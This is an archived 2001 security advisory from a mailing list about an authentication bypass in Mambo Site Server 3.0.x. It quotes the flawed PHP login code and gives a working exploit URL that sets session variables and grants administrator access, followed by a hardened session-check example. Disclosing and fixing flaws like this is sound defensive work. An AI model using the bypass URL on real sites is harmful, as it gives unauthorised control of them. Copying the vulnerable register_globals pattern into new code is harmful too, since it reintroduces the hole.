Serious security hole in Mambo Site Server version 3.0.X

From: root (Reverse) (rootat_private)
Date: Wed Jul 25 2001 - 04:42:09 PDT

    Serious security hole in Mambo Site Server version 3.0.X
    Jul, 24 2001
    by: Ismael Peinado Palomo - postmasterat_private
    www.reverseonline.com
    
    Summary
    Mambo Site Server is a dynamic portal engine and content management tool
    based on PHP and MySQL.
    
    Details
    Vulnerable systems:
    Mambo Site Server version 3.0.0 - 3.0.5
    
    Immune systems:
    
    Impact:
    Any user can gain administrator privileges.
    
    Exploits:
    
    Under the 'administrator/' directory we found that index.php checks the user
    and password:
    
    if (isset($submit)){
      $query  = "SELECT id, password, name FROM users WHERE username='$myname' AND (usertype='administrator' OR usertype='superadministrator')";
      $result = $database->openConnectionWithReturn($query);
      if (mysql_num_rows($result)!= 0){
       list($userid, $dbpass, $fullname) = mysql_fetch_array($result);
    
       .....
    
       if (strcmp($dbpass,$pass)) {
        //if the password entered does not match the database record ask user to login again
        print "<SCRIPT>alert('Incorrect Username and Password, please try again'); document.location.href='index.php';</SCRIPT>\n";
       }else {
        //if the password matches the database
        if ($remember!="on"){
         //if the user does not want the password remembered and the cookie is set, delete the cookie
         if ($passwordcookie!=""){
          setcookie("passwordcookie");
          $passwordcookie="";
         }
        }
        //set up the admin session then take the user into the admin section of the site
        session_register("myname");
        session_register("fullname");
        session_register("userid");
        print "<SCRIPT>window.open('index2.php','newwindow');</SCRIPT>\n";
        print "<SCRIPT>document.location.href='$live_site'</SCRIPT>\n";
    
       }
      }else {
       print "<SCRIPT>alert('Incorrect Username and Password, please try again'); document.location.href='index.php';</SCRIPT>\n";
      }
    
    As we can see, if the password for the administrator matches the one in the
    database, some variables are registered in the session and we are redirected
    to index2.php, so let's take a look at index2.php:
    
     if (!$PHPSESSID){
      print "<SCRIPT>document.location.href='index.php'</SCRIPT>\n";
      exit(0);
      }
     else {
      session_start();
      if (!$myname) session_register("myname");
      if (!$fullname) session_register("fullname");
      if (!$uid) session_register("userid");
      }
    
    Here we can see that the only verification of a valid user is through the
    global variable PHPSESSID, so if we declare that variable in the URL and also
    set 'myname', 'fullname' and 'userid', we can gain administrative control.
    So we'll test:
    
    http://target.machine/administrator/index2.php?PHPSESSID=1&myname=admin&fullname=admin&userid=administrator
    
    BINGO!! Now we have full administrative privileges. That's a typical
    example of PHP hacking: it's clear that security can't rely on global
    variables, since they may be modified through URL parameters.
    
    Ismael Peinado Palomo
    Ingeniero Jefe I+D
    postmasterat_private
    www.reverseonline.com
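A hardened form of the index2.php guard, as an added example that is neither Mambo Site Server's code nor the advisory author's. With PHP's register_globals on, request parameters such as ?PHPSESSID=1&userid=administrator become ordinary global variables, which is why the original check on $PHPSESSID and the session_register() calls can be satisfied straight from the URL. The version below decides only from the server-side $_SESSION array (PHP 4.1 and later), which index.php fills after the password check has passed; the function names start_admin_session() and admin_session_is_valid() are assumptions for illustration, and the two halves are shown in one file for brevity although they belong in index.php and index2.php respectively.

```php
<?php
// Added example, not Mambo Site Server's code. Assumptions: the same three
// session fields as the advisory (userid, myname, fullname), PHP 4.1+ for
// $_SESSION, PHP 5.1+ for session_regenerate_id(true).

// Accept the session id from the cookie only. With this setting a request
// such as index2.php?PHPSESSID=1 cannot name or create a session.
ini_set('session.use_only_cookies', '1');
ini_set('session.use_trans_sid', '0');
session_start();

// --- index.php side: called only after the strcmp() password check passes.
function start_admin_session($userid, $myname, $fullname)
{
    // New id on privilege change, so an id an attacker handed to the victim
    // before login is not promoted to an administrator session.
    session_regenerate_id(true);
    $_SESSION['userid']   = $userid;
    $_SESSION['myname']   = $myname;
    $_SESSION['fullname'] = $fullname;
}

// --- index2.php side: the guard that replaces the original "if (!$PHPSESSID)".
// Decides purely from server-side state; bare globals such as $myname or
// $_GET['userid'] are request data and are never consulted.
function admin_session_is_valid($session)
{
    if (!is_array($session)) {
        return false;
    }
    foreach (array('userid', 'myname', 'fullname') as $field) {
        if (!isset($session[$field]) || $session[$field] === '') {
            return false;
        }
    }
    return true;
}

if (!admin_session_is_valid($_SESSION)) {
    // Discard any partial state and send the client to the login form.
    $_SESSION = array();
    session_destroy();
    header('Location: index.php');
    exit(0);
}

// Only now copy the trusted values into the variables the rest of the admin
// code expects; they come from the session store, not from the request.
$userid   = $_SESSION['userid'];
$myname   = $_SESSION['myname'];
$fullname = $_SESSION['fullname'];
```

The important difference from the original is that index2.php never calls session_register() on a variable it has not verified: in the original, session_register("myname") stores whatever $myname currently holds, and under register_globals that value is the attacker's URL parameter. Turning register_globals off (the default from PHP 4.2.0 onward) removes the easy path, but the guard above is safe either way because it reads only what index.php wrote.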
    



    This archive was generated by hypermail 2b30 : Wed Jul 25 2001 - 08:40:48 PDT